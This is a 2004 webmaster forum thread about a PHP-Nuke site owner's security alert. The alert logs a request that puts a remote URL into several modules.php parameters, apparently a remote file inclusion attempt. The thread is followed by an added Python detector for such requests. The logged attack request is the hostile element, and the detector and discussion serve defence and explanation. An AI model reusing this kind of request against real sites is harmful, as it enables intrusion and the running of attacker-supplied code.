Website Technology Issues Forum

    
Hack Attempt
Some sort of PHP Script to Hack my site?
neweb




msg:665619
 10:04 am on Jul 8, 2004 (gmt 0)

Hi,

I've been receiving several notifications like the following ... with [217.XX.104.226...] in the URL ... and just am curious if anyone knows what they are attempting to do?

Date & Time: 2004-07-08 02:30:56
Blocked IP: unknown...
User ID: Anonymous (1)
Reason: Abuse - OTHER
--------------------
User Agent: curl/7.11.2 (i386-pc-linux-gnu) libcurl/7.11.2 OpenSSL/0.9.7 ipv6 zlib/1.2.1.1
Query String: newbiehangout.com/modules.php?name=http://217.XX.104.226/&file=http://217.XX.104.226/&func=http://217.XX.104.226/
Forwarded For: unknown
Client IP: none
Remote Address: 62.2XX.221.7
Remote Port: 57529
Request Method: GET
--------------------
Who-Is for IP
OrgName: Unknown Works
OrgID: UNKNOW
Address: 3928 SE Tolman st
City: Portland
StateProv: OR
PostalCode: 97202
Country: US

NetRange: 63.2XX.164.144 - 63.2XX.164.151
CIDR: 63.2XX.164.144/29
NetName: UNKNOWNWORKS
NetHandle: NET-63-2XX-164-144-1
Parent: NET-63-2XX-0-0-1
NetType: Reassigned
Comment:
RegDate: 2000-11-16
Updated: 2000-11-16

TechHandle: IO-ORG-ARIN
TechName: Internet Operations, XXYY
TechPhone: +1-800-672-8520
TechEmail: dns-info@XXYY.net

Thank you!

[edited by: DaveAtIFG at 7:37 pm (utc) on July 8, 2004]
[edit reason] No specifics please [/edit]

 

JasonD




msg:665620
 2:53 pm on Jul 8, 2004 (gmt 0)

Mods and/or admins.

Please delete the above post or at least edit the URLs in there. Whatever any of you do, don't enter any of the URLs.

neweb




msg:665621
 10:58 pm on Jul 8, 2004 (gmt 0)

Oh,

I'm terribly sorry.

Thanks for editing it.

Does anyone have any ideas on this though?

Thanks.

JasonD




msg:665622
 12:17 am on Jul 9, 2004 (gmt 0)

No problem pal.

Let's just say it's been years since I got caught out with techniques like that and it definitely "woke me up".

The URL that was in the original post led my browser to open multiple non-stop, self-replicating popups with huge binary sound files.

It's a play on the old trick of doing the same but with telnet windows to consume CPU resource, leading to a crash. If my memory serves me correctly, it was part of the first .hta virii generator called God Message (or something similar).

Anyway...... as to the cause of why you are getting these messages. Where are you receiving them from?

A software firewall like Zone Alarm etc., or in your server logs?

neweb




msg:665623
 3:08 am on Jul 9, 2004 (gmt 0)

Hi Jason,

Thanks for letting me know.

I've been plagued with hack attempts ever since I opened up my PHP Nuke area. I was successfully hacked two times (2 days in a row) a few months ago and then I put in some major security features ... one of which is called "Sentinel" and that is the program that is sending me the alerts letting me know that someone was banned on my site.

Usually the hack alert notifications are pretty straightforward and I can easily see what they were attempting ... usually it's some sort of SQL injection method or a play on the URL trying to add an admin account or something. And now Sentinel is beefed up to even ban Agents or "web site grabbers".

But I just didn't understand the point of this one or what they were trying to accomplish with this. I've received tons of them in the last couple of days.

Seems kind of weird that they would be doing that to themselves ;o)

Anyway, thanks for your help and again ... sorry ... wasn't thinking when I posted that.

Take care!

Darla

JasonD




msg:665624
 9:11 am on Jul 9, 2004 (gmt 0)

It sounds as if it could be aimed at you.

Just by posting the URL to your server you are getting the alerts. If they realise this, then in all honesty you (and I) are going to check it out, leading to the desired result.

Or.... if newbiehangout is your site, they could well be using it to mask attempts on others, as it appears from the format of the URL that it is proxying the request.

Good old-fashioned social engineering technique.

neweb




msg:665625
 3:01 am on Jul 10, 2004 (gmt 0)

Hi Again,

Yep, that's my URL .... but I quit checking the attempted hacks a long time ago. They were hitting my site left and right. I've come to believe in "security through obscurity" LOL

My site was fine until I developed a couple of modules for PHP Nuke ... and then the script kiddies found me and had a heyday until I installed all the security features. I still haven't added the content back to the Nuke Portal area ... I got a little nervous about re-adding it again after the first hacks. But, there haven't been any successful hacks in about 3 months now ... so I guess I just need to get over it and move on ;o) It was a good learning experience for me though. Prior to that, I knew nothing about security and I ended up paying a price for that.

It's actually almost funny now ... but then it's also terribly sad that they don't have anything better to do than to mess with other people's sites like that. And they can't even claim it's for a "cause" or anything ;) It's just malicious. And I don't even think that they really "know" what they're doing. Most of the attempts come in floods ... like after a new vulnerability is posted ...

It's like they wait for someone else to post a code and then they just copy and paste it to see if it works ;o)

Awww, well ... live and learn.

You've been a pleasure to talk to and I appreciate your help.

Take care.

Darla
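
The alert in the first post logs a query string in which the name, file and func parameters each hold an absolute URL where a script would normally expect a local module or file name. As an added example (not part of the thread and not Sentinel's code), the Python below flags that pattern in logged requests, including percent-encoded variants; the function names and the second and third sample requests are assumptions constructed for illustration.

```python
from urllib.parse import parse_qsl, unquote, urlsplit

REMOTE_SCHEMES = {"http", "https", "ftp"}   # value points off-site
MAX_DECODE_ROUNDS = 3                        # assumption: undoes nested %-encoding

# First entry is the query string from the alert above (redacted as posted);
# the other two are constructed for this example.
SAMPLE_REQUESTS = [
    "newbiehangout.com/modules.php?name=http://217.XX.104.226/"
    "&file=http://217.XX.104.226/&func=http://217.XX.104.226/",
    "newbiehangout.com/modules.php?name=News&file=article&sid=42",
    "modules.php?name=News&file=hTTp%253A%252F%252Fhost.invalid%252Fx",
]


def fully_decode(value):
    """Percent-decode until stable so double-encoded URLs are not missed."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def remote_url_params(request):
    """Return {param: decoded value} for parameters whose value is a remote URL."""
    head, sep, tail = request.partition("?")
    # Accept "host/path?query" (the alert's format) or a bare query string.
    query = tail if sep and "=" not in head else request
    flagged = {}
    for key, raw in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(raw).strip()
        try:
            parts = urlsplit(value)
        except ValueError:          # malformed netloc, e.g. unbalanced "["
            continue
        if parts.scheme in REMOTE_SCHEMES and parts.netloc:
            flagged[key] = value
    return flagged


def triage(requests):
    """Map each request to the sorted names of its URL-valued parameters."""
    return [sorted(remote_url_params(r)) for r in requests]


if __name__ == "__main__":
    for req, hits in zip(SAMPLE_REQUESTS, triage(SAMPLE_REQUESTS)):
        print("FLAG" if hits else "ok  ", hits, req)
```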

WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved